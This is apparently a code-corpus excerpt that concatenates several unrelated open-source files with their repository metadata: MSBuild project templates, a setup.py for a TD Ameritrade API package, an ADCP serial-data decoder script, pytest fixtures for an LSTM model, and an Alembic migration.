</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(pcbuild_prefix)s%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
%(includes)s
%(compiles)s
%(resources)s
%(others)s<ItemGroup>
<ProjectReference Include="pythoncore.vcxproj">
<Project>{cf7ac3d1-e2df-41d2-bea6-1e2556cdea26}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>"""
vcxproj_filters_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
%(source_filterdef)s
%(include_filterdef)s
%(resource_filterdef)s
%(python_filterdef)s
%(cython_filterdef)s
%(other_filterdef)s
</ItemGroup>
%(source_filters)s
%(include_filters)s
%(resource_filters)s
%(python_filters)s
%(cython_filters)s
%(other_filters)s
</Project>"""
props_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
props_debug_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup>
<ItemDefinitionGroup>
<ClCompile>%(compiles_debug_props)s%(additional_include_dirs)s
</ClCompile>
<ResourceCompile>%(resources_debug_props)s
</ResourceCompile>
</ItemDefinitionGroup>
</Project>"""
guids_template = """\
guid = '%s'
source_filterdef_guid = '%s'
include_filterdef_guid = '%s'
other_filterdef_guid = '%s'
python_filterdef_guid = '%s'
cython_filterdef_guid = '%s'
resource_filterdef_guid = '%s'
"""
num_guids = guids_template.count('%s')
def gen_guids():
t = guids_template
uuids = [
'{%s}' % str(uuid.uuid1()).upper()
for _ in range(0, num_guids)
]
return t % tuple(uuids)
| true | true |
f71029e3924c8dd93bfee8142465de9c95b5d32c | 742 | py | Python | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | 1 | 2020-12-04T20:46:24.000Z | 2020-12-04T20:46:24.000Z | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | null | null | null | setup.py | sshh12/pymeritrade | 0bb73922c8c08207cf55b934867cf780559d9871 | [
"MIT"
] | null | null | null | import setuptools
def _read_file(path, mode="r"):
    """Return the entire contents of the file at *path*."""
    with open(path, mode) as handle:
        return handle.read()


# Long description comes straight from the README; install requirements
# are one package spec per line in requirements.txt.
long_description = _read_file("README.md", "r")
required = _read_file("requirements.txt").splitlines()

_METADATA = dict(
    name="pymeritrade",
    version="0.1.4",
    author="Shrivu Shankar",
    author_email="shrivu1122+pymeritrade@gmail.com",
    description="A Python API for TD Ameritrade.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/sshh12/pymeritrade",
    packages=setuptools.find_packages(),
    install_requires=required,
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

setuptools.setup(**_METADATA)
| 25.586207 | 52 | 0.672507 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
with open("requirements.txt") as f:
required = f.read().splitlines()
setuptools.setup(
name="pymeritrade",
version="0.1.4",
author="Shrivu Shankar",
author_email="shrivu1122+pymeritrade@gmail.com",
description="A Python API for TD Ameritrade.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/sshh12/pymeritrade",
packages=setuptools.find_packages(),
install_requires=required,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| true | true |
f7102a3b2be5c1c5cc7c227eb2f94f35c34f04bc | 4,838 | py | Python | tests/test_DecodeSerialData.py | ricorx7/rti-python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | 1 | 2017-06-10T13:27:44.000Z | 2017-06-10T13:27:44.000Z | tests/test_DecodeSerialData.py | ricorx7/rti-python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | 10 | 2019-12-28T18:06:18.000Z | 2022-03-25T18:48:20.000Z | tests/test_DecodeSerialData.py | ricorx7/rti_python | 1316323b782ddb8df357e55404f507a9573e172c | [
"BSD-3-Clause"
] | null | null | null | import threading
import socket
import sys
import getopt
from log import logger
from Codecs.AdcpCodec import AdcpCodec
from Comm.AdcpSerialPortServer import AdcpSerialPortServer
class DecodeSerialData:
    """Read raw ADCP serial data relayed over TCP and feed it to a codec.

    An AdcpSerialPortServer republishes the serial stream on a local TCP
    port; this class connects to that port on a worker thread, reads the
    raw bytes and passes them to an AdcpCodec for decoding.
    """

    def __init__(self, tcp_port, comm_port, baud):
        """
        Start the serial-port TCP server and the reader thread.

        :param tcp_port: TCP port the serial server publishes on.
        :param comm_port: Serial (COM) port to open.
        :param baud: Serial baud rate.
        """
        self.is_alive = True
        self.raw_serial_socket = None

        # Create the codec that decodes the raw ADCP byte stream.
        self.codec = AdcpCodec()

        # Serial port server: reads the serial port and republishes on TCP.
        self.serial_server = AdcpSerialPortServer(str(tcp_port),
                                                  comm_port,
                                                  baud)

        # BUG FIX: the original passed
        #   target=self.create_raw_serial_socket(tcp_port)
        # which *called* the method synchronously on the current thread and
        # used its return value (None) as the thread target, so the worker
        # thread never did any work.  Pass the callable plus args instead.
        self.serial_server_thread = threading.Thread(
            name='AdcpDecoder',
            target=self.create_raw_serial_socket,
            args=(tcp_port,))
        self.serial_server_thread.start()

    def create_raw_serial_socket(self, port):
        """
        Connect to the ADCP serial server (which outputs the serial data on
        TCP) and start reading it.

        :param port: TCP port to connect to on localhost.
        """
        try:
            # Create socket and connect to the local relay.
            self.raw_serial_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.raw_serial_socket.connect(('localhost', int(port)))
            # Timeout lets the read loop periodically re-check is_alive.
            self.raw_serial_socket.settimeout(1)

            # Start to read the raw data.
            self.read_tcp_socket()
        except ConnectionRefusedError as err:
            # Lazy %-style args; the original passed err as a stray
            # positional argument with no placeholder in the message.
            logger.error("Serial Send Socket: %s", err)
            sys.exit(1)
        except Exception as err:
            logger.error("Serial Send Socket: Error Opening socket: %s", err)
            sys.exit(1)

    def read_tcp_socket(self):
        """
        Read the raw serial data from the TCP port and feed it to the codec
        until the object is shut down.
        """
        while self.is_alive:
            try:
                # Read data from socket.
                data = self.raw_serial_socket.recv(4096)

                # If data exists, pass it to the codec.
                if data:
                    self.codec.add(data)
            except socket.timeout:
                # Expected: just lets the loop re-check is_alive.
                pass
            except Exception as e:
                logger.error("Exception in reading data: %s", e)
                self.stop_adcp_server()

        print("Read Thread turned off")

    def stop_adcp_server(self):
        """
        Stop the read loop, the ADCP serial TCP server, the socket and the
        reader thread.
        """
        # Stop the thread loop.
        self.is_alive = False

        if self.serial_server is not None:
            self.serial_server.close()
            logger.debug("serial server stopped")
        else:
            logger.debug('No serial connection')

        # Close the socket if it was ever opened (the original closed it
        # unconditionally and raised AttributeError when never connected).
        if self.raw_serial_socket is not None:
            self.raw_serial_socket.close()

        # Join the reader thread unless we *are* the reader thread (this
        # method is also called from read_tcp_socket's error path, and
        # joining the current thread raises RuntimeError).
        if (self.serial_server_thread is not None
                and self.serial_server_thread is not threading.current_thread()):
            self.serial_server_thread.join()

        # BUG FIX: the original called self.close_file_write(), a method
        # that does not exist on this class and raised AttributeError.
        logger.debug("Stop the Recorder")
def main(argv):
    """Parse the command line options and run the serial decoder."""
    usage = 'test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>'

    # Defaults used when no overriding option is supplied.
    tcp_port = "55056"
    comm_port = '/dev/tty.usbserial-FT0ED8ZR'
    baud = 115200

    try:
        opts, _ = getopt.getopt(argv, "hlt:c:b:", [])
    except getopt.GetoptError:
        print(usage)
        sys.exit(2)

    for flag, value in opts:
        if flag == '-h':
            print(usage)
            sys.exit()
        elif flag == '-l':
            print("Available Serial Ports:")
            AdcpSerialPortServer.list_serial_ports()
            exit()
        elif flag == '-t':
            tcp_port = value
        elif flag == '-c':
            comm_port = value
        elif flag == '-b':
            baud = int(value)

    # Get a list of all the serial ports available
    print("Available Serial Ports:")
    serial_list = AdcpSerialPortServer.list_serial_ports()

    print("TCP Port: " + tcp_port)
    print("Comm Port: " + comm_port)
    print("Baud rate: " + str(baud))

    # Verify a good serial port was given
    if comm_port not in serial_list:
        print("----------------------------------------------------------------")
        print("BAD SERIAL PORT GIVEN")
        print("Please use -c to give a good serial port.")
        print("-l will give you a list of all available serial ports.")
        return

    # Run serial port reader until stopped
    sdr = DecodeSerialData(tcp_port, comm_port, baud)
    sdr.stop_adcp_server()
if __name__ == "__main__":
main(sys.argv[1:]) | 32.911565 | 120 | 0.564283 | import threading
import socket
import sys
import getopt
from log import logger
from Codecs.AdcpCodec import AdcpCodec
from Comm.AdcpSerialPortServer import AdcpSerialPortServer
class DecodeSerialData:
    # Reads raw ADCP data republished over TCP and feeds it to the codec.

    def __init__(self, tcp_port, comm_port, baud):
        """Start the ADCP serial port server and the TCP reader.

        :param tcp_port: TCP port the serial server republishes raw data on.
        :param comm_port: Serial (COM) port to read ADCP data from.
        :param baud: Serial baud rate.
        """
        self.is_alive = True
        self.raw_serial_socket = None
        self.serial_server_thread = None
        # Codec that decodes the raw ADCP byte stream.
        self.codec = AdcpCodec()
        # TCP server that republishes the serial port's data.
        self.serial_server = AdcpSerialPortServer(str(tcp_port),
                                                  comm_port,
                                                  baud)
        # NOTE(review): the target is *called* here rather than passed as a
        # callable, so the read loop runs synchronously in the constructor
        # and the thread is created with target=None -- confirm intent.
        self.serial_server_thread = threading.Thread(name='AdcpDecoder', target=self.create_raw_serial_socket(tcp_port))
        self.serial_server_thread.start()

    def create_raw_serial_socket(self, port):
        """Connect to the local serial server on ``port`` and start reading."""
        try:
            self.raw_serial_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.raw_serial_socket.connect(('localhost', int(port)))
            # Timeout lets the read loop notice is_alive going False.
            self.raw_serial_socket.settimeout(1)
            self.read_tcp_socket()
        except ConnectionRefusedError as err:
            # NOTE(review): err is passed without a %s placeholder, so the
            # logging module cannot format it -- verify output.
            logger.error("Serial Send Socket: ", err)
            exit()
        except Exception as err:
            logger.error('Serial Send Socket: ", Error Opening socket', err)
            exit()

    def read_tcp_socket(self):
        """Read raw serial data from the TCP socket until stopped."""
        while self.is_alive:
            try:
                # Read data from socket
                data = self.raw_serial_socket.recv(4096)
                # If data exist process
                if len(data) > 0:
                    # Send the data received to the codec
                    self.codec.add(data)
            except socket.timeout:
                # Just a socket timeout, continue on
                pass
            except Exception as e:
                logger.error("Exception in reading data.", e)
                self.stop_adcp_server()
        print("Read Thread turned off")

    def stop_adcp_server(self):
        """Stop the serial TCP server, close the socket and join the thread."""
        # Stop the thread loop
        self.is_alive = False
        if self.serial_server is not None:
            self.serial_server.close()
            logger.debug("serial server stopped")
        else:
            logger.debug('No serial connection')
        # Close the socket
        self.raw_serial_socket.close()
        # Stop the server thread
        if self.serial_server_thread is not None:
            self.serial_server_thread.join()
        # Close the open file
        # NOTE(review): close_file_write() is not defined on this class, so
        # this call raises AttributeError at shutdown -- verify.
        self.close_file_write()
        logger.debug("Stop the Recorder")
def main(argv):
    """Parse the command line options and run the serial decoder.

    Supported flags: -h (help), -l (list serial ports), -t (TCP port),
    -c (serial/comm port), -b (baud rate).
    """
    # Defaults used when no overriding option is supplied.
    tcp_port = "55056"
    comm_port = '/dev/tty.usbserial-FT0ED8ZR'
    baud = 115200
    try:
        opts, args = getopt.getopt(argv,"hlt:c:b:", [])
    except getopt.GetoptError:
        print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            # Print usage and quit.
            print('test_DecodeSerialData.py -t <tcp_port> -c <comm> -b <baud>')
            sys.exit()
        elif opt in ("-l"):
            print("Available Serial Ports:")
            AdcpSerialPortServer.list_serial_ports()
            exit()
        elif opt in ('-t'):
            tcp_port = arg
        elif opt in ("-c"):
            comm_port = arg
        elif opt in ("-b"):
            baud = int(arg)
    # Get a list of all the serial ports available
    print("Available Serial Ports:")
    serial_list = AdcpSerialPortServer.list_serial_ports()
    print("TCP Port: " + tcp_port)
    print("Comm Port: " + comm_port)
    print("Baud rate: " + str(baud))
    # Verify a good serial port was given
    if comm_port in serial_list:
        # Run serial port
        sdr = DecodeSerialData(tcp_port, comm_port, baud)
        sdr.stop_adcp_server()
    else:
        print("----------------------------------------------------------------")
        print("BAD SERIAL PORT GIVEN")
        print("Please use -c to give a good serial port.")
        print("-l will give you a list of all available serial ports.")
if __name__ == "__main__":
main(sys.argv[1:]) | true | true |
f7102bbbb5e3e0d524fd7b1d3ea685d7b17ed8f4 | 1,421 | py | Python | test/lmp/model/_lstm/conftest.py | a868111817/language-model-playground | 814ab9ca7ba7c927de39123fdb7539acd2d0e5cc | [
"Beerware"
] | 9 | 2020-07-31T10:27:28.000Z | 2021-12-23T05:58:03.000Z | test/lmp/model/_lstm/conftest.py | Aidenzich/language-model-playground | daecd4e39bbf8128b04aa236ad1d31cd22c3c1d9 | [
"Beerware"
] | 10 | 2020-07-28T05:32:52.000Z | 2022-03-04T06:36:23.000Z | test/lmp/model/_lstm/conftest.py | Aidenzich/language-model-playground | daecd4e39bbf8128b04aa236ad1d31cd22c3c1d9 | [
"Beerware"
] | 20 | 2020-07-08T07:05:39.000Z | 2021-09-22T07:20:46.000Z | r"""Setup fixtures for testing :py:class:`lmp.model.LSTMModel`."""
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
    tknzr: BaseTknzr,
    d_emb: int,
    d_hid: int,
    n_hid_lyr: int,
    n_pre_hid_lyr: int,
    n_post_hid_lyr: int,
    p_emb: float,
    p_hid: float,
) -> LSTMModel:
    r"""Example ``LSTMModel`` instance."""
    # Gather the constructor arguments first, then expand them, so the
    # mapping between fixture parameters and model arguments is explicit.
    model_kwargs = {
        'd_emb': d_emb,
        'd_hid': d_hid,
        'n_hid_lyr': n_hid_lyr,
        'n_pre_hid_lyr': n_pre_hid_lyr,
        'n_post_hid_lyr': n_post_hid_lyr,
        'p_emb': p_emb,
        'p_hid': p_hid,
        'tknzr': tknzr,
    }
    return LSTMModel(**model_kwargs)
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
    r"""Example input batch of token ids."""
    # Token ids are bounded by the model's vocabulary size; the batch has
    # shape (2, 3).
    vocab_size = lstm_model.emb.num_embeddings
    return torch.randint(low=0, high=vocab_size, size=(2, 3))
@pytest.fixture
def batch_next_tkids(
    lstm_model: LSTMModel,
    batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
    r"""Example target batch of token ids."""
    # Shift the input batch: drop the last column and append one fresh
    # random token id per row, keeping the shape of ``batch_prev_tkids``.
    n_rows = batch_prev_tkids.shape[0]
    fresh_last_col = torch.randint(
        low=0,
        high=lstm_model.emb.num_embeddings,
        size=(n_rows, 1),
    )
    return torch.cat([batch_prev_tkids[..., :-1], fresh_last_col], dim=1)
| 22.555556 | 66 | 0.581985 |
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
    tknzr: BaseTknzr,
    d_emb: int,
    d_hid: int,
    n_hid_lyr: int,
    n_pre_hid_lyr: int,
    n_post_hid_lyr: int,
    p_emb: float,
    p_hid: float,
) -> LSTMModel:
    r"""Example ``LSTMModel`` instance built from the hyperparameter fixtures."""
    return LSTMModel(
        d_emb=d_emb,
        d_hid=d_hid,
        n_hid_lyr=n_hid_lyr,
        n_pre_hid_lyr=n_pre_hid_lyr,
        n_post_hid_lyr=n_post_hid_lyr,
        p_emb=p_emb,
        p_hid=p_hid,
        tknzr=tknzr,
    )
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
    r"""Example input batch of token ids with shape (2, 3)."""
    # Ids are sampled below the model's vocabulary size.
    return torch.randint(
        low=0,
        high=lstm_model.emb.num_embeddings,
        size=(2, 3),
    )
@pytest.fixture
def batch_next_tkids(
    lstm_model: LSTMModel,
    batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
    r"""Example target batch: input shifted with one fresh random last token."""
    # Same shape as `batch_prev_tkids`.
    return torch.cat(
        [
            batch_prev_tkids[..., :-1],
            torch.randint(
                low=0,
                high=lstm_model.emb.num_embeddings,
                size=(batch_prev_tkids.shape[0], 1),
            ),
        ],
        dim=1,
    )
| true | true |
f7102c3ab6bd0cb874396d2b18df2dc4e19d5326 | 733 | py | Python | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | null | null | null | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | 92 | 2022-01-27T08:05:09.000Z | 2022-03-31T06:54:46.000Z | backend/databasemodel/alembic/versions/b4eea63fd165_add_cityname_indexes_for_filtering.py | GispoCoding/tarmo | 064eead90991fb2836173b647282e044dfa06c5a | [
"MIT"
] | null | null | null | """add cityname indexes for filtering
Revision ID: b4eea63fd165
Revises: 850af1d21f5e
Create Date: 2022-05-05 17:39:57.826059
"""
import os
from alembic import op
here = os.path.dirname(os.path.realpath(__file__))
# revision identifiers, used by Alembic.
revision = "b4eea63fd165"
down_revision = "850af1d21f5e"
branch_labels = None
depends_on = None
revision_dir = f"{here}/{revision}"
# idea from https://github.com/tbobm/alembic-sequeled
def process_migration(script_name: str):
    """Execute the SQL script for this revision, if it is non-empty.

    :param script_name: Base name of the SQL file inside this revision's
        directory (``upgrade`` or ``downgrade``).
    """
    filename = f"{revision_dir}/{script_name}.sql"
    # BUGFIX: read via a context manager so the file handle is closed, and
    # use read() directly -- joining the line iterator with "\n" kept each
    # line's own trailing newline and doubled every line break.
    with open(filename) as sql_file:
        query = sql_file.read()
    if len(query) > 0:
        op.execute(query)
def upgrade():
    """Apply this revision by executing its ``upgrade.sql`` script."""
    process_migration("upgrade")
def downgrade():
    """Revert this revision by executing its ``downgrade.sql`` script."""
    process_migration("downgrade")
| 19.289474 | 53 | 0.723056 | import os
from alembic import op
here = os.path.dirname(os.path.realpath(__file__))
revision = "b4eea63fd165"
down_revision = "850af1d21f5e"
branch_labels = None
depends_on = None
revision_dir = f"{here}/{revision}"
def process_migration(script_name: str):
    """Execute this revision's ``<script_name>.sql`` file, if non-empty."""
    filename = f"{revision_dir}/{script_name}.sql"
    # NOTE(review): joining the open-file line iterator with "\n" doubles
    # every line break (lines keep their own newline) and leaves the file
    # handle unclosed -- consider `with open(filename) as f: f.read()`.
    query = "\n".join(open(filename))
    if len(query) > 0:
        op.execute(query)
def upgrade():
    """Apply this revision (runs ``upgrade.sql``)."""
    process_migration("upgrade")
def downgrade():
    """Revert this revision (runs ``downgrade.sql``)."""
    process_migration("downgrade")
| true | true |
f7102cf126adafab6de592904ddaa1d404fe782b | 1,011 | py | Python | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | src/sima/metocean/blueprints/extremevalue.py | SINTEF/simapy | 650b8c2f15503dad98e2bfc0d0788509593822c7 | [
"MIT"
] | null | null | null | #
